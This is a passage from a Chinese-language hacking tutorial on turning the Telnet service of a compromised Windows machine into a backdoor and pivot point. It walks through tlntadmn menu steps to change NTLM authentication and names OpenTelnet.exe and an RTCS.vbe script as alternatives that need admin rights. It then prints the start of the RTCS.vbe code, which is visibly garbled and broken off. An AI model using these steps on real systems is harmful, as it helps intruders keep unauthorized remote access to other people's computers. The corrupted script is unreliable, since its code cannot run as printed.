巧用Telnet做后门和跳板

3、使用Telnet服务器管理程序更改设置

在肉鸡上输入“tlntadmn”命令，如图3所示，然后输入数字“3”，选择“显示/更改注册表设置”。

&说明

(1)在Telnet服务器管理程序中还有其它五个输入选项：输入“0”退出管理程序，输入“1”列出当前用户，输入“2”结束一个用户的会话，输入“4”开始服务，输入“5”停止服务。

(2)在WindowsXp中不能使用Telnet服务器管理程序直接进行管理，只能通过命令行方式进行管理，输入“tlntadmn/?”可以查看其详细帮助。

4、修改注册表中的NTLM值

如图4所示，在菜单中选择“7”，接着输入“y”确认修改，然后输入“0”以及输入“y”确认修改，最后输入“0”退出当前菜单。

&说明

(1)本案例是在控制对方计算机的情况下，特别是开启了远程终端的情况下，通过这种方式比较简便;其实还有其它两种方式，比如使用opentelnet.exe(需要管理员权限且开启IPC管道)以及使用RTCS脚本(需要管理员权限但不依赖IPC管道)。

(2)OpenTelnet 的具体使用方式为：“OpenTelnet.exe

(3)RTCS.vbe 脚本的使用方式为：“ct RTCS.vbe targetIP usernamepasswordNTLMAuthor telnetport”，RTCS.vbe代码如下：

on error resume next

set outstreem=wt.stdout

if (lcase(center(wt.fullname,11))="wt.exe") th

en

set objShell=wt.createt("wt.shell")

objShell.Run("cmd.exe /k ct//nologo"&chr(34)&wt.tfullname&chr(34))